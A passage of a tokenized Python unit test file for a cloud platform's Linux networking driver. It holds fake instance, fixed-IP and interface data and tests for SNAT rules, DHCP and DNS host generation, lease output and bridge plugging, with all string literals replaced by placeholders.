'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } ] <EOL> fixed_ips = [ { '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> 
'<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:6> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:6> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } ] <EOL> vifs = [ { '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> 
'<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:6> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : '<STR_LIT>' } ] <EOL> def get_associated 
( context , network_id , host = None , address = None ) : <EOL> result = [ ] <EOL> for datum in fixed_ips : <EOL> if ( datum [ '<STR_LIT>' ] == network_id <EOL> and datum [ '<STR_LIT>' ] is not None <EOL> and datum [ '<STR_LIT>' ] is not None ) : <EOL> instance = instances [ datum [ '<STR_LIT>' ] ] <EOL> if host and host != instance [ '<STR_LIT:host>' ] : <EOL> continue <EOL> if address and address != datum [ '<STR_LIT:address>' ] : <EOL> continue <EOL> cleaned = { } <EOL> cleaned [ '<STR_LIT:address>' ] = datum [ '<STR_LIT:address>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> vif = vifs [ datum [ '<STR_LIT>' ] ] <EOL> cleaned [ '<STR_LIT>' ] = vif [ '<STR_LIT:address>' ] <EOL> cleaned [ '<STR_LIT>' ] = instance [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = instance [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = instance [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> result . append ( cleaned ) <EOL> return result <EOL> class LinuxNetworkUtilsTestCase ( test . NoDBTestCase ) : <EOL> def test_is_pid_cmdline_correct ( self ) : <EOL> fake_open = mock . mock_open ( read_data = '<STR_LIT>' ) <EOL> with mock . patch . object ( linux_net , '<STR_LIT>' , fake_open , create = True ) : <EOL> self . assertFalse ( linux_net . is_pid_cmdline_correct ( <NUM_LIT:1> , "<STR_LIT:foo>" ) , <EOL> "<STR_LIT>" ) <EOL> fake_open = mock . mock_open ( <EOL> read_data = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> with mock . patch . object ( linux_net , '<STR_LIT>' , fake_open , create = True ) : <EOL> self . assertFalse ( <EOL> linux_net . is_pid_cmdline_correct ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> fake_open = mock . 
mock_open ( <EOL> read_data = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> with mock . patch . object ( linux_net , '<STR_LIT>' , fake_open , create = True ) : <EOL> self . assertTrue ( <EOL> linux_net . is_pid_cmdline_correct ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> '<STR_LIT>' ) <EOL> for err in ( IOError , OSError ) : <EOL> fake_open = mock . mock_open ( <EOL> read_data = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> fake_open . side_effect = err <EOL> with mock . patch . object ( linux_net , '<STR_LIT>' , fake_open , create = True ) : <EOL> self . assertFalse ( <EOL> linux_net . is_pid_cmdline_correct ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> '<STR_LIT>' ) <EOL> class LinuxNetworkTestCase ( test . NoDBTestCase ) : <EOL> REQUIRES_LOCKING = True <EOL> def setUp ( self ) : <EOL> super ( LinuxNetworkTestCase , self ) . setUp ( ) <EOL> self . driver = driver . load_network_driver ( ) <EOL> self . driver . db = db <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' , <EOL> is_admin = True ) <EOL> def get_vifs ( _context , instance_uuid , use_slave ) : <EOL> return [ vif for vif in vifs if vif [ '<STR_LIT>' ] == <EOL> instance_uuid ] <EOL> def get_instance ( _context , instance_id ) : <EOL> return instances [ instance_id ] <EOL> self . stub_out ( '<STR_LIT>' , get_vifs ) <EOL> self . stub_out ( '<STR_LIT>' , get_instance ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> get_associated ) <EOL> def _test_add_snat_rule ( self , expected , is_external ) : <EOL> def verify_add_rule ( chain , rule ) : <EOL> self . assertEqual ( '<STR_LIT>' , chain ) <EOL> self . assertEqual ( expected , rule ) <EOL> self . called = True <EOL> self . stubs . Set ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , verify_add_rule ) <EOL> self . called = False <EOL> linux_net . add_snat_rule ( '<STR_LIT>' , is_external ) <EOL> if expected : <EOL> self . assertTrue ( self . 
called ) <EOL> def test_add_snat_rule_no_ext ( self ) : <EOL> self . flags ( routing_source_ip = '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_snat_rule ( expected , False ) <EOL> def test_add_snat_rule_ext ( self ) : <EOL> self . flags ( routing_source_ip = '<STR_LIT>' ) <EOL> expected = ( ) <EOL> self . _test_add_snat_rule ( expected , True ) <EOL> def test_add_snat_rule_snat_range_no_ext ( self ) : <EOL> self . flags ( routing_source_ip = '<STR_LIT>' , <EOL> force_snat_range = [ '<STR_LIT>' ] ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_snat_rule ( expected , False ) <EOL> def test_add_snat_rule_snat_range_ext ( self ) : <EOL> self . flags ( routing_source_ip = '<STR_LIT>' , <EOL> force_snat_range = [ '<STR_LIT>' ] ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_snat_rule ( expected , True ) <EOL> def test_update_dhcp_for_nw00 ( self ) : <EOL> self . flags ( use_single_default_gateway = True ) <EOL> self . mox . StubOutWithMock ( self . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( fileutils , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( os , '<STR_LIT>' ) <EOL> self . driver . write_to_file ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> self . driver . write_to_file ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> os . chmod ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> os . chmod ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . driver . update_dhcp ( self . 
context , "<STR_LIT>" , networks [ <NUM_LIT:0> ] ) <EOL> def test_update_dhcp_for_nw01 ( self ) : <EOL> self . flags ( use_single_default_gateway = True ) <EOL> self . mox . StubOutWithMock ( self . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( fileutils , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( os , '<STR_LIT>' ) <EOL> self . driver . write_to_file ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> self . driver . write_to_file ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> fileutils . ensure_tree ( mox . IgnoreArg ( ) ) <EOL> os . chmod ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> os . chmod ( mox . IgnoreArg ( ) , mox . IgnoreArg ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . driver . update_dhcp ( self . context , "<STR_LIT>" , networks [ <NUM_LIT:0> ] ) <EOL> def _get_fixedips ( self , network , host = None ) : <EOL> return objects . FixedIPList . get_by_network ( self . context , <EOL> network , <EOL> host = host ) <EOL> def test_get_dhcp_hosts_for_nw00 ( self ) : <EOL> self . flags ( use_single_default_gateway = True ) <EOL> expected = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> fixedips = self . _get_fixedips ( networks [ <NUM_LIT:0> ] ) <EOL> actual_hosts = self . driver . get_dhcp_hosts ( self . context , networks [ <NUM_LIT:0> ] , <EOL> fixedips ) <EOL> self . assertEqual ( expected , actual_hosts ) <EOL> def test_get_dhcp_hosts_for_nw01 ( self ) : <EOL> self . 
flags ( use_single_default_gateway = True ) <EOL> expected = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> fixedips = self . _get_fixedips ( networks [ <NUM_LIT:1> ] , host = '<STR_LIT>' ) <EOL> actual_hosts = self . driver . get_dhcp_hosts ( self . context , networks [ <NUM_LIT:1> ] , <EOL> fixedips ) <EOL> self . assertEqual ( expected , actual_hosts ) <EOL> def test_get_dns_hosts_for_nw00 ( self ) : <EOL> expected = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> actual_hosts = self . driver . get_dns_hosts ( self . context , networks [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( expected , actual_hosts ) <EOL> def test_get_dns_hosts_for_nw01 ( self ) : <EOL> expected = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> actual_hosts = self . driver . get_dns_hosts ( self . context , networks [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( expected , actual_hosts ) <EOL> def test_get_dhcp_opts_for_nw00 ( self ) : <EOL> self . flags ( use_single_default_gateway = True ) <EOL> expected_opts = '<STR_LIT>' <EOL> fixedips = self . _get_fixedips ( networks [ <NUM_LIT:0> ] ) <EOL> actual_opts = self . driver . get_dhcp_opts ( self . context , networks [ <NUM_LIT:0> ] , <EOL> fixedips ) <EOL> self . assertEqual ( expected_opts , actual_opts ) <EOL> def test_get_dhcp_opts_for_nw00_no_single_default_gateway ( self ) : <EOL> self . flags ( use_single_default_gateway = False ) <EOL> expected_opts = '<STR_LIT>' <EOL> fixedips = self . _get_fixedips ( networks [ <NUM_LIT:0> ] ) <EOL> actual_opts = self . driver . get_dhcp_opts ( self . context , networks [ <NUM_LIT:0> ] , <EOL> fixedips ) <EOL> self . assertEqual ( expected_opts , actual_opts ) <EOL> def test_get_dhcp_opts_for_nw01 ( self ) : <EOL> self . flags ( use_single_default_gateway = True ) <EOL> expected_opts = "<STR_LIT>" <EOL> fixedips = self . _get_fixedips ( networks [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> actual_opts = self . driver . 
get_dhcp_opts ( self . context , networks [ <NUM_LIT:1> ] , <EOL> fixedips ) <EOL> self . assertEqual ( expected_opts , actual_opts ) <EOL> def test_get_dhcp_leases_for_nw00 ( self ) : <EOL> timestamp = timeutils . utcnow ( ) <EOL> seconds_since_epoch = calendar . timegm ( timestamp . utctimetuple ( ) ) <EOL> leases = self . driver . get_dhcp_leases ( self . context , networks [ <NUM_LIT:0> ] ) <EOL> leases = leases . split ( '<STR_LIT:\n>' ) <EOL> for lease in leases : <EOL> lease = lease . split ( '<STR_LIT:U+0020>' ) <EOL> data = get_associated ( self . context , <NUM_LIT:0> , address = lease [ <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( data [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( data [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( int ( lease [ <NUM_LIT:0> ] ) > seconds_since_epoch ) <EOL> self . assertEqual ( data [ '<STR_LIT>' ] , lease [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( data [ '<STR_LIT:address>' ] , lease [ <NUM_LIT:2> ] ) <EOL> self . assertEqual ( data [ '<STR_LIT>' ] , lease [ <NUM_LIT:3> ] ) <EOL> self . assertEqual ( '<STR_LIT:*>' , lease [ <NUM_LIT:4> ] ) <EOL> def test_get_dhcp_leases_for_nw01 ( self ) : <EOL> self . flags ( host = '<STR_LIT>' ) <EOL> timestamp = timeutils . utcnow ( ) <EOL> seconds_since_epoch = calendar . timegm ( timestamp . utctimetuple ( ) ) <EOL> leases = self . driver . get_dhcp_leases ( self . context , networks [ <NUM_LIT:1> ] ) <EOL> leases = leases . split ( '<STR_LIT:\n>' ) <EOL> for lease in leases : <EOL> lease = lease . split ( '<STR_LIT:U+0020>' ) <EOL> data = get_associated ( self . context , <NUM_LIT:1> , address = lease [ <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( data [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( int ( lease [ <NUM_LIT:0> ] ) > seconds_since_epoch ) <EOL> self . assertEqual ( data [ '<STR_LIT>' ] , lease [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( data [ '<STR_LIT:address>' ] , lease [ <NUM_LIT:2> ] ) <EOL> self . 
assertEqual ( data [ '<STR_LIT>' ] , lease [ <NUM_LIT:3> ] ) <EOL> self . assertEqual ( '<STR_LIT:*>' , lease [ <NUM_LIT:4> ] ) <EOL> def test_dhcp_opts_not_default_gateway_network ( self ) : <EOL> expected = "<STR_LIT>" <EOL> fixedip = objects . FixedIPList . get_by_network ( self . context , <EOL> { '<STR_LIT:id>' : <NUM_LIT:0> } ) [ <NUM_LIT:0> ] <EOL> actual = self . driver . _host_dhcp_opts ( fixedip . virtual_interface_id ) <EOL> self . assertEqual ( expected , actual ) <EOL> def test_host_dhcp_without_default_gateway_network ( self ) : <EOL> expected = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> fixedip = objects . FixedIPList . get_by_network ( self . context , <EOL> { '<STR_LIT:id>' : <NUM_LIT:0> } ) [ <NUM_LIT:0> ] <EOL> actual = self . driver . _host_dhcp ( fixedip ) <EOL> self . assertEqual ( expected , actual ) <EOL> def test_host_dhcp_truncated_hostname ( self ) : <EOL> expected = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> fixedip = objects . FixedIPList . get_by_network ( self . context , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> } ) [ <NUM_LIT:0> ] <EOL> actual = self . driver . _host_dhcp ( fixedip ) <EOL> self . assertEqual ( expected , actual ) <EOL> def test_host_dns_without_default_gateway_network ( self ) : <EOL> expected = "<STR_LIT>" <EOL> fixedip = objects . FixedIPList . get_by_network ( self . context , <EOL> { '<STR_LIT:id>' : <NUM_LIT:0> } ) [ <NUM_LIT:0> ] <EOL> actual = self . driver . _host_dns ( fixedip ) <EOL> self . assertEqual ( expected , actual ) <EOL> def test_linux_bridge_driver_plug ( self ) : <EOL> """<STR_LIT>""" <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> return "<STR_LIT>" , "<STR_LIT>" <EOL> self . stubs . Set ( utils , '<STR_LIT>' , fake_execute ) <EOL> def verify_add_rule ( chain , rule ) : <EOL> self . assertEqual ( '<STR_LIT>' , chain ) <EOL> self . assertIn ( '<STR_LIT>' , rule ) <EOL> self . 
stubs . Set ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , verify_add_rule ) <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> driver . plug ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False } , "<STR_LIT>" ) <EOL> def test_linux_ovs_driver_plug_exception ( self ) : <EOL> self . flags ( fake_network = False ) <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> raise processutils . ProcessExecutionError ( '<STR_LIT>' ) <EOL> def fake_device_exists ( * args , ** kwargs ) : <EOL> return False <EOL> self . stubs . Set ( utils , '<STR_LIT>' , fake_execute ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , fake_device_exists ) <EOL> driver = linux_net . LinuxOVSInterfaceDriver ( ) <EOL> exc = self . assertRaises ( exception . OvsConfigurationFailure , <EOL> driver . plug , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> self . assertRegex ( <EOL> str ( exc ) , <EOL> re . compile ( "<STR_LIT>" , <EOL> re . DOTALL ) ) <EOL> self . assertIsInstance ( exc . kwargs [ '<STR_LIT>' ] , <EOL> processutils . ProcessExecutionError ) <EOL> def test_vlan_override ( self ) : <EOL> """<STR_LIT>""" <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> info = { } <EOL> @ staticmethod <EOL> def test_ensure ( vlan , bridge , interface , network , mac_address , mtu ) : <EOL> info [ '<STR_LIT>' ] = interface <EOL> self . stubs . Set ( linux_net . LinuxBridgeInterfaceDriver , <EOL> '<STR_LIT>' , test_ensure ) <EOL> network = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> self . flags ( vlan_interface = "<STR_LIT>" ) <EOL> driver . plug ( network , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ '<STR_LIT>' ] ) <EOL> self . flags ( vlan_interface = "<STR_LIT>" ) <EOL> driver . plug ( network , "<STR_LIT>" ) <EOL> self . 
assertEqual ( "<STR_LIT>" , info [ '<STR_LIT>' ] ) <EOL> driver . plug ( network , "<STR_LIT>" ) <EOL> def test_flat_override ( self ) : <EOL> """<STR_LIT>""" <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> info = { } <EOL> @ staticmethod <EOL> def test_ensure ( bridge , interface , network , gateway ) : <EOL> info [ '<STR_LIT>' ] = interface <EOL> self . stubs . Set ( linux_net . LinuxBridgeInterfaceDriver , <EOL> '<STR_LIT>' , test_ensure ) <EOL> network = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> } <EOL> driver . plug ( network , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ '<STR_LIT>' ] ) <EOL> self . flags ( flat_interface = "<STR_LIT>" ) <EOL> driver . plug ( network , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ '<STR_LIT>' ] ) <EOL> def _test_dnsmasq_execute ( self , extra_expected = None ) : <EOL> network_ref = { '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> return "<STR_LIT>" , "<STR_LIT>" <EOL> def fake_add_dhcp_mangle_rule ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , fake_execute ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , <EOL> fake_add_dhcp_mangle_rule ) <EOL> self . stub_out ( '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> dev = '<STR_LIT>' <EOL> default_domain = CONF . 
